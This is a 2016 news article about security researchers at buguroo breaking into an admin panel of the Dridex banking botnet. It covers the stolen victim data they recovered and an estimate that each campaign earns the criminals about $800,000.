Security firm turns the table and hacks the bad guys

Apr 7, 2016 11:30 GMT  ·  By

Security researchers from buguroo have managed to find one of Dridex's many admin panels, and after leveraging an older vulnerability, they hacked its backend, retrieved user data and kept an eye on its activity to analyze how the crooks operated.

Their investigation started in January 2016, when their bugFraud Defense endpoint protection system detected a classic Dridex alert, related to Web injections taking place in the user's browser, where Dridex's malware was loading malicious JavaScript on banking websites in order to steal authentication credentials.

Researchers track down and hack one of Dridex's backend

Analyzing the alerts in more depth, researchers found the IP address of one of the Dridex admin panels hardcoded in the malicious JavaScript files used to hijack the user's browser.

Because Dridex operations are carried out on a massive scale, the crooks behind this huge botnet use multiple smaller infrastructures, which security researchers call subnets. This fractured architecture makes it harder to detect Dridex's operations for security firms, and also harder to sinkhole the cybergang's infrastructure.

buguroo researchers managed to discover the admin panel of a Dridex section previously known as Subnet 220. Luck had it that this subnet was running an older version of the Dridex backend, in which some weaknesses have been previously discovered.

This vulnerability allowed researchers to crack open Subnet 220's admin panel and take a look inside. By recovering the data found inside this backend, buguroo researchers were able to determine the scale at which these crooks operate, along with discovering new techniques used in more recent attacks.

Dridex crooks make around $800,000 for every 16,000 stolen credentials

Besides uncovering actual evidence that the crooks are behind the recent Locky ransomware infections, of which there were numerous other reports, researchers also found victim data that included details such as bank accounts, victim names, last login dates, and card numbers with additional details such as the card's type, bank and country.

Most of the data belonged to banks from English-speaking countries, but victims were from all over the world, mainly from Europe and the Asia-Pacific region.

Statistically, researchers found data from more than 100 countries, belonging to over 900 business entities, of which 70 percent were from English-speaking issuing organizations, and 85 percent of victims were from non-English-speaking countries.

Researchers say that Dridex crooks operate in short-burst campaigns, and launch multiple attacks at various intervals. On average, the crooks collect 16,000 credit card numbers per campaign, from which they steal around $500 from each victim.

Since banks detect and block these illicit transactions in 90 percent of cases, this means that crooks pocket around $800,000 per each campaign.

Dridex coders can earn $800,000 per campaign
Dridex coders can earn $800,000 per campaign

Photo Gallery (5 Images)

How Dridex generally operates
Dridex coders can earn $800,000 per campaignDridex Subnet 220 admin panel login page
+2more